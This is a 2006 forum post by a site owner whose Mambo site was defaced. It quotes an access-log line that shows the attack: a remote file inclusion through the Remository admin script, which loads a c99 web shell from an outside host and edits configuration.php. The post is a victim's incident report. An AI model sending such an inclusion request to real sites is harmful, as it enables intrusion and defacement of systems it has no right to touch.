dogsbody
Karma: 0
|
Mambo hacked via remository - 2006/08/11 10:24
Hi,
Today my mambo site was hacked and all pages replaced with THIS.
The hack was pretty simple, mambo's configuration.php file was overwritten which instantly replaced all the site pages with this one.
Looking at my log files it looks like they got in via the remository admin interface!...
88.240.237.27 - - [11/Aug/2006:09:42:42 +0100] "POST /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http%3A%2F%
2Fdeadbone.by.ru%2Fc99.txt%3Fcmd&act=f&f=configuration.php&ft=edit&d=%2Fhome%2Fsites%2Fsite3%2Fweb HTTP/1.1" 200 3703 "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http%3A%2F%
2Fdeadbone.by.ru%2Fc99.txt%3Fcmd&act=f&f=configuration.php&ft=edit&d=%2Fhome%2Fsites%2Fsite3%2Fweb" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
|
Forum
